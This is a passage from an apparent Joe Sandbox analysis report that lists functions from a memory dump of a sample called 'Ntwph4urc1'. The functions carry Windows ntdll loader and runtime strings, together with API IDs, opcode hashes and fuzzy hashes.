                                              • LdrpFindDllActivationContext, xrefs: 369B3636, 369B3662
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 3446177414-3779518884
                                              • Opcode ID: 474fc231cc2fd54aea9a5e36cb2348133cc9f879a6738970a0444d6c2a451843
                                              • Instruction ID: 231bbd7af3afd2d9cd086235148fcd8cce0f0819ec89b5e426b06f7c2d3e99f7
                                              • Opcode Fuzzy Hash: 474fc231cc2fd54aea9a5e36cb2348133cc9f879a6738970a0444d6c2a451843
                                              • Instruction Fuzzy Hash: 74311666D00315EEEF21DA49CC88A56B2ACAF41B94F724067D9C467153DBA0BC81C6FD
                                              Function 3696245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                              Download Yara Rule
                                              Strings
                                              • apphelp.dll, xrefs: 36962462
                                              • minkernel\ntdll\ldrinit.c, xrefs: 369AA9A2
                                              • LdrpDynamicShimModule, xrefs: 369AA998
                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 369AA992
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-176724104
                                              • Opcode ID: bb2afa8085fe8707c5414da129887d60ca73a994cf70a0ada5bc9a80fc1c8ac5
                                              • Instruction ID: be771ee2202d0bf2bec585c65d0dbdaf7a5cb29c5e87d945a27d63648e283e34
                                              • Opcode Fuzzy Hash: bb2afa8085fe8707c5414da129887d60ca73a994cf70a0ada5bc9a80fc1c8ac5
                                              • Instruction Fuzzy Hash: DD312675A00341ABE710DF5DCD40A6A7BFAFB88794F350059EA00BB241C7B89C53CB80
                                              Function 369F20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$[$]:%u
                                              • API String ID: 48624451-2819853543
                                              • Opcode ID: c6805bdc877f3ec59ec0fe0b139447025195c796e209053683cd3baf05acc0cd
                                              • Instruction ID: 14eedb8b41822bafa2b3f57058b03e20fba4da615dd2b7e43629295c5ef9a64d
                                              • Opcode Fuzzy Hash: c6805bdc877f3ec59ec0fe0b139447025195c796e209053683cd3baf05acc0cd
                                              • Instruction Fuzzy Hash: 852183B6E10119ABDB00DFA9CC40AEF7BFCAF54684F550116E905EB201E732D901CBA5
                                              Function 3693F910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 3446177414-3610490719
                                              • Opcode ID: 8db9da246f31f059d9fe9a7e59b998471f1af482ddeb5a876ae3d110701845aa
                                              • Instruction ID: 102e407007f00a410dcfee9ba30bcd3ca708247b3c8fbcc95eba647fd46e875a
                                              • Opcode Fuzzy Hash: 8db9da246f31f059d9fe9a7e59b998471f1af482ddeb5a876ae3d110701845aa
                                              • Instruction Fuzzy Hash: 01912E71A02751DFE716CF25CC80B6AB7E9AF84754F300459E9449B282EB34EC41CBA2
                                              Function 36960BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • minkernel\ntdll\ldrinit.c, xrefs: 369AA121
                                              • LdrpCheckModule, xrefs: 369AA117
                                              • Failed to allocated memory for shimmed module list, xrefs: 369AA10F
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-161242083
                                              • Opcode ID: c0da8923efecfc5610e0a3fab15962fca5b379c42e5cebf1d11e4966b37f716c
                                              • Instruction ID: e5a446badef0f6b138631f897677f4a7c01c9fb4ab9d9bbcc64a8436a6925b8a
                                              • Opcode Fuzzy Hash: c0da8923efecfc5610e0a3fab15962fca5b379c42e5cebf1d11e4966b37f716c
                                              • Instruction Fuzzy Hash: 3F71D474E00305DFEB14DF69CE80AAEB7F9FB48358F254469D502AB211E739AD42CB51
                                              Function 36A18927 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 187timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $File
                                              • API String ID: 3446177414-2412145507
                                              • Opcode ID: e2d95a950450de063108171b04a705e26e32a31a5f5c0a7e21065965cd6f0e40
                                              • Instruction ID: 916e1c725ab8789723ac29a663914a3272358e6bd778d2aa12a1983928dbffe2
                                              • Opcode Fuzzy Hash: e2d95a950450de063108171b04a705e26e32a31a5f5c0a7e21065965cd6f0e40
                                              • Instruction Fuzzy Hash: B8619E71A1022CABDB26CF65CC51BEDBBB9AB08700F5441E9E909EB181DB749F84CF54
                                              Function 36969803 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 3446177414-2283098728
                                              • Opcode ID: 08817405933766cc5962b79db1718d06d808b5028c2d0b04ad85963f59652134
                                              • Instruction ID: 5bc9c47eb95e31e14c38715105feee009ddce84a724c368455ec7212a8733d5f
                                              • Opcode Fuzzy Hash: 08817405933766cc5962b79db1718d06d808b5028c2d0b04ad85963f59652134
                                              • Instruction Fuzzy Hash: 4C51D571A047039FE714DF2ACC84B19F7ADBB8436CF24066DE9559B291DB34E805CB92
                                              Function 3697C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • minkernel\ntdll\ldrinit.c, xrefs: 369B82E8
                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 369B82DE
                                              • Failed to reallocate the system dirs string !, xrefs: 369B82D7
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-1783798831
                                              • Opcode ID: f9364465b4926c2543c2829929d07951af57091bdd1507383ed635ac12943d84
                                              • Instruction ID: 3e1d8c952323ccc7964cbbc55a820b479f272ab163d82eb9e26b1046bb3b77b1
                                              • Opcode Fuzzy Hash: f9364465b4926c2543c2829929d07951af57091bdd1507383ed635ac12943d84
                                              • Instruction Fuzzy Hash: 614102B5918300EFD710DB68CD40B4B7BEDAF49690F21482AFA44E7251EB34DC02CB92
                                              Function 3697BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                              Download Yara Rule
                                              Strings
                                              • RTL: Resource at %p, xrefs: 369B7B8E
                                              • RTL: Re-Waiting, xrefs: 369B7BAC
                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 369B7B7F
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 0-871070163
                                              • Opcode ID: 954460affb40c15b0bc8887dd00d7a560b26381c5656c49b33ff53fb02ba019c
                                              • Instruction ID: 26e5b425bf42ee32dd95ca065c9750c4ee706da5fa33de80dbdf0fa9130ebd3d
                                              • Opcode Fuzzy Hash: 954460affb40c15b0bc8887dd00d7a560b26381c5656c49b33ff53fb02ba019c
                                              • Instruction Fuzzy Hash: DD41CF39A047069FE710DE25CC40B5AB7E9EF88720F200A1DE9599B384DB31E905DB92
                                              Function 3697B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                              Download Yara Rule
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 369B728C
                                              Strings
                                              • RTL: Resource at %p, xrefs: 369B72A3
                                              • RTL: Re-Waiting, xrefs: 369B72C1
                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 369B7294
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-605551621
                                              • Opcode ID: 5caef3a817d77472588148ce6a76f5052a6fbfde2f10214c912ec82cfac6fdbe
                                              • Instruction ID: 22727c3da14ee87c76a58af8841fb3872cb86a97d6db52383a02d71d9394100b
                                              • Opcode Fuzzy Hash: 5caef3a817d77472588148ce6a76f5052a6fbfde2f10214c912ec82cfac6fdbe
                                              • Instruction Fuzzy Hash: D041CC35A00216AFEB10CE25CC45B5AB7A9FF84754F200A19F954AB384DB31E856DBE2
                                              Function 369C4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 369C4888
                                              • minkernel\ntdll\ldrredirect.c, xrefs: 369C4899
                                              • LdrpCheckRedirection, xrefs: 369C488F
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                              • API String ID: 3446177414-3154609507
                                              • Opcode ID: c5337fbb78b2ae158c55e5d41f2f65cec958f07177daff231e03f78cad5b2f80
                                              • Instruction ID: e69719980031676dd10cd28de3918d5b467f049e8031d0dbc0ec851b18db3db2
                                              • Opcode Fuzzy Hash: c5337fbb78b2ae158c55e5d41f2f65cec958f07177daff231e03f78cad5b2f80
                                              • Instruction Fuzzy Hash: CE41CF76B04361CBEB11CE199840E167BE9AB89F90F210559ED46AB251D720DC01CBF2
                                              Function 369F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$]:%u
                                              • API String ID: 48624451-3050659472
                                              • Opcode ID: fae6c71473cbf76d4d9578f5a0931159d4ef60a13e89c85c3a0d3a186c085463
                                              • Instruction ID: 20e13e24e21cf24c2ccef2460c98e78f3784d3e6a2afb389d2f1e0483fc33198
                                              • Opcode Fuzzy Hash: fae6c71473cbf76d4d9578f5a0931159d4ef60a13e89c85c3a0d3a186c085463
                                              • Instruction Fuzzy Hash: 0731B6B6A106199FDB10CE69CC40BEE77FCEF44641F910499E849EB200EB71DA44CFA1
                                              Function 369C5F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Wow64 Emulation Layer
                                              • API String ID: 3446177414-921169906
                                              • Opcode ID: 19c34f5a4bf51fbae147d4b494af7ae4eb5a3cbddbc7fa16e15518ee20ac7e02
                                              • Instruction ID: 804478ebbce708efbb3d49b2f531eecc1ce499d78c10452e628006f3c26a8d65
                                              • Opcode Fuzzy Hash: 19c34f5a4bf51fbae147d4b494af7ae4eb5a3cbddbc7fa16e15518ee20ac7e02
                                              • Instruction Fuzzy Hash: D42106B690021DBFAB01DBA19C84DBF7F7DEF852D8B150064FA01A2140E634EE16EB61
                                              Function 36A17CD6 Relevance: 6.4, APIs: 4, Instructions: 397timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 00af6786de96ab53b2ca9557305d3ce85eec15749107a4433718b2bf8dc133a9
                                              • Instruction ID: a080d9a0f068e733d3fb241797499ec171b00bb44288af7df2800637a5349d53
                                              • Opcode Fuzzy Hash: 00af6786de96ab53b2ca9557305d3ce85eec15749107a4433718b2bf8dc133a9
                                              • Instruction Fuzzy Hash: 23E15F71E0031DAFEB15CFA5C884BEEB7B9BF44355F20812AE915EB280E7749A45CB50
                                              Function 3696EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 05d328f9596c910b1c232b0b9e85605ea15a9b023e6ceaccf8cef359d17e052c
                                              • Instruction ID: 77b79fc0e7580b8c1ec6ec0f7a283400d7ef1fba4d4f87624f1c6c1998de5b41
                                              • Opcode Fuzzy Hash: 05d328f9596c910b1c232b0b9e85605ea15a9b023e6ceaccf8cef359d17e052c
                                              • Instruction Fuzzy Hash: E7E103B4D04718DFDB21CFAAC980A9DBBF6FF48368F20456AE545A7261D730A842CF50
                                              Function 369BEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 029b0c4bd5cf123d2f834354c68b0101aa7e6fd87b00f792f2b9ae36b4936a35
                                              • Instruction ID: 5e497a405e9fcda6c85737d0f014137e6b355f53c57d76674c8e4118cc3752a3
                                              • Opcode Fuzzy Hash: 029b0c4bd5cf123d2f834354c68b0101aa7e6fd87b00f792f2b9ae36b4936a35
                                              • Instruction Fuzzy Hash: 657128B1E00219AFEF05CFE9D984ADDBBB9BF48354F144429E915FB250D7349906CB90
                                              Function 36A1A4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 2f20415b6a96119e84809299789b20da8f21a2c0a0f9f05b47e247d45bee7e0d
                                              • Instruction ID: f91fa4aad79b8682aea90d573b6d545a0325ee4ce9c9524f88e6b72bce5dbd2d
                                              • Opcode Fuzzy Hash: 2f20415b6a96119e84809299789b20da8f21a2c0a0f9f05b47e247d45bee7e0d
                                              • Instruction Fuzzy Hash: 74516C79B187229FEB08CF19C994A19B7F5BF88364B20406DDA06DB710DBB0EC41CB80
                                              Function 369BF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 4f8794c41bfb0025daadb7241aa98845db343a22933beb53f955ec67c6d6100c
                                              • Instruction ID: fef5a83dd5654ae6830a18020fe796f4024155834f417691abd4c70880bc6337
                                              • Opcode Fuzzy Hash: 4f8794c41bfb0025daadb7241aa98845db343a22933beb53f955ec67c6d6100c
                                              • Instruction Fuzzy Hash: 015133B6E00219AFEF04CFD9D844ADDBBB5BF48394F24812AE815BB250D7349942CF64
                                              Function 36977B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                              • String ID:
                                              • API String ID: 4281723722-0
                                              • Opcode ID: 4f9c846a1bcd9577a8a444548289943f2af785fdb73e3c562a4f2a69984aaf52
                                              • Instruction ID: 5d92f04cbe6ee743120a00702f925321ff34b0be3e4501b9c3225c0d1c6eb843
                                              • Opcode Fuzzy Hash: 4f9c846a1bcd9577a8a444548289943f2af785fdb73e3c562a4f2a69984aaf52
                                              • Instruction Fuzzy Hash: 30312475E00228DFCF55DFA8D844A9DBBF1BB48760F20416AE511BB290DB359D02CFA4
                                              Function 369459C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 8c1f0277de533b5d4db3b218852eeb7c4570e2b1d5a39788f12465e1e0342aa4
                                              • Instruction ID: 328339035a6ba9c15fdb75a79c18a0745357ef8f65f6ece21a3f8e537d0b448f
                                              • Opcode Fuzzy Hash: 8c1f0277de533b5d4db3b218852eeb7c4570e2b1d5a39788f12465e1e0342aa4
                                              • Instruction Fuzzy Hash: 96324670D04369DFEB26DFA4C984BDEBBB4BB08308F1041E9D549A7241EB749A84CF91
                                              Function 36987D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-
                                              • API String ID: 1302938615-2137968064
                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                              • Instruction ID: 93f80b6989c94811dccdf37a982b822c150871ec2b53fc3af61c07758fa788fd
